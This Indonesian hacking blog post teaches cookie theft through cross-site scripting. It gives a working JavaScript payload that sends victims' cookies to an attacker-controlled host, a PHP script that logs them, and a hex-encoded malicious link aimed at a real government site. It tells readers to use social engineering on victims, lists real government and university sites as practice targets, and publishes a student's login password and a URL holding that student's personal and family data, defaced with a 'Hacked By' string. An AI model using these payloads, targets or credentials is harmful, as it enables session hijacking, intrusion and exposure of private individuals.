Cara mencuri data cookie dan data admin dengan teknik xss

    Halo guys jumpa lagi ama gue admin kece from IES ya..
    Ok kalo sebelumnya gue ngebahas seputar teknik xss untuk sekedar main-main(ngubah Tampilan doang)Kali ini gue bakal bahas teknik xss yang lebih mendalam

 Jika kita melihat lebih jauh lagi, maka XSS dapat digunakan untuk pencurian cookie, mau tau caranya..?
Bahan-bahan yang diperlukan :
1. Hosting yang support PHP (terserah yang gratisan)

2. Tiga buah script yang akan diletakkan di dalam hosting :

file : artikel.js
===============================================================
document.location=”http://www.lifedeary.com/h4ckld/artikel.php?c=”+document.cookie
===============================================================

file : artikel.php
===============================================================
<?php
$f=fopen(‘kuki.txt’, ‘a’);
$date=date(“j F, Y, g:i a”);
fwrite($f, “IP Address : “.$_SERVER[‘REMOTE_ADDR’].”\n”.
“Cookie : “.$_GET[‘c’].”\n”.
“Date/Time : “.$date.”\n\n\n”);
fclose($f);
?>
===============================================================

file : kuki.txt

3. https://addons.mozilla.org/en-US/firefox/addon/firebug/
Firebug digunakan untuk mengganti cookie hasil pencurian

4. Melakukan social engineering kepada korban dengan bermacam cara. Sehingga korban terpancing untuk mengklik link yang kita kirim :
http://dishub.lampungprov.go.id/statistik.php?id=5&mm=<scriptsrc=”http://www.lifedeary.com/h4ckld/artikel.js”></script&gt;
atau gunakan http://centricle.com/tools/ascii-hex/untuk merubah kebentuk hex menjadi :
http://dishub.lampungprov.go.id/statistik.php?id=5&mm=
%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%6c%69%66%65%64%65%61%72%79%2e%63%6f%6d%2f%68%34%63%6b%6c%64%2f%61%72%74%69%6b%65%6c%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e

5. Jika berhasil maka isi dari file kuki.txt sebagai berikut :
IP Address : 118.82.24.3
Cookie : mindsparktb_206720000=true; mindsparktbsupport_206720000=true; PHPSESSID=a2a391276b949de0ce6de78183e194a0
Date/Time : 27 September, 2012, 3:45 pm
Kalau sudah dapat seperti di atas, langkah terakhir merubah cookie dengan firebug dan terengggggggg…kita sudah menjadi admin disitus ini.

Target untuk latihan :

http://www.bi.go.id/web/id/
Stored XSS lebih jarang ditemui dan dampak serangannya lebih besar. Sebuah serangan stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali. Contohnya adalah pada message board, buku tamu, dll. Penyerang memasukkan kode HTML atau client script code lainnya pada posting mereka.

Contoh Kasus :
1. http://222.124.178.110/html/index.php?&id=buku

2. http://118.98.162.51/dinas/?pilih=guestbook

3. http://www.unima.ac.id/mahasiswa/index.php
Masuk dengan username : 11310648 dan password : 543159406968
Ambil URL hiddennya menggunakan Tamper Data (https://addons.mozilla.org/id/firefox/addon/tamper-data/), sehingga didapatkan :

http://www.unima.ac.id/mahasiswa/Updatedatamhs.php?NamaMhs=Ivo+Stianingsih+Mamonto&JalurMhs=SNMPTN+Tertulis&Fakultas=Fakultas&Angkatan=2012+&JenisKelamin=Laki-Laki&AsalPropinsi=Sulawesi+Utara&TempatLahir=kotamobagu&TanggalLahir=1995-01-02+&Agama=KRISTEN+PROTESTAN&Alamat=tataaran+1&Beasiswa=-&AsalSLAPT=SMA+N+1+KOTAMOBAGU&nama_ayah=Bambang+Mamonto&nama_ibu=Hajirah+Peasuh&nama_wali=-&Status_Ayah=Masih+hidup&Status_Ibu=Masih+hidup&AlamatOT=Kotamobagu&PendidikanOT=D3&PekerjaanOT=PNS&PekerjaanIbu=Guru&PekerjaanWali=-&Penghasilan_Ayah=Rp+2500000&Penghasilan_Ibu=Rp+1500000&NoTelpOT=082191235557&NoTelpWali=-&DosenPA=Dr.+H.D.+Rompas%2C+Msi&Email=Ivomamonto%40yahoo.co.id&SumberDana=-&IP=0.00&IPK=0.00&Status_Mhs=Tidak+Aktif&Jenjang_Mhs=D3&Simpan=Simpan

http://www.unima.ac.id/mahasiswa/Updatedatamhs.php?NamaMhs=Ivo+Stianingsih+Mamonto&JalurMhs=SNMPTN+Tertulis&Fakultas=Fakultas&Angkatan=2012+&JenisKelamin=Hacked By ComeBack&AsalPropinsi=Sulawesi+Utara&TempatLahir=kotamobagu&TanggalLahir=1995-01-02+&Agama=KRISTEN+PROTESTAN&Alamat=tataaran+1&Beasiswa=-&AsalSLAPT=SMA+N+1+KOTAMOBAGU&nama_ayah=Bambang+Mamonto&nama_ibu=Hajirah+Peasuh&nama_wali=-&Status_Ayah=Masih+hidup&Status_Ibu=Masih+hidup&AlamatOT=Kotamobagu&PendidikanOT=D3&PekerjaanOT=PNS&PekerjaanIbu=Guru&PekerjaanWali=-&Penghasilan_Ayah=Rp+2500000&Penghasilan_Ibu=Rp+1500000&NoTelpOT=082191235557&NoTelpWali=-&DosenPA=Dr.+H.D.+Rompas%2C+Msi&Email=Ivomamonto%40yahoo.co.id&SumberDana=-&IP=0.00&IPK=0.00&Status_Mhs=Tidak+Aktif&Jenjang_Mhs=D3&Simpan=Simpan

http://unima.ac.id/datamhs/printbukti.php?nim=11310648